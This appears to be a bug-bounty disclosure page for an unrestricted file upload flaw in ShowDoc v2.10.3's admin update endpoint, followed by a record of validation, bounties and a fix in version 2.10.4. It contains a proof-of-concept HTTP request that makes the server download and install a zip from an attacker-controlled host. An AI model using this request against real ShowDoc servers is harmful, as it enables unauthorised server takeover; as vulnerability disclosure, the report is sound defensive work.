There is a Unrestricted Upload of File vulnerability in ShowDoc v2.10.3 in star7th/showdoc

Valid

Reported on

Mar 20th 2022

Description

There is a Unrestricted Upload of File vulnerability in AdminUpdateController.class.php in ShowDoc v2.10.3

Proof of Concept

POST /showdoc-2.10.3/server/index.php?s=/api/adminUpdate/download HTTP/1.1
Host: 10.211.55.5
Content-Length: 66
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Origin: http://10.211.55.5
Referer: http://10.211.55.5/showdoc-2.10.3/web/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=47uvgq7efm1ethua6a8podcse6; think_language=zh-CN; cookie_token=09d404934af99f9a7cafad11e061df0c23fc785a28781b655a152a7b1eb43000
Connection: origin

new_version=666&file_url=http://192.168.1.7:88/showdoc-666.zip

Impact

After the attacker login to the admin panel, the vulnerability can be used to obtain server privileges.

Occurrences

AdminUpdateController.class.php L32

References

We are processing your report and will contact the star7th/showdoc team within 24 hours. a year ago

We have contacted a member of the star7th/showdoc team and are waiting to hear back a year ago

star7th validated this vulnerability a year ago

Xiaoshui has been awarded the disclosure bounty

The fix bounty is now up for grabs

star7th marked this as fixed in 2.10.4 with commit bd792a a year ago

star7th has been awarded the fix bounty

This vulnerability will not receive a CVE

AdminUpdateController.class.php#L32 has been validated

to join this conversation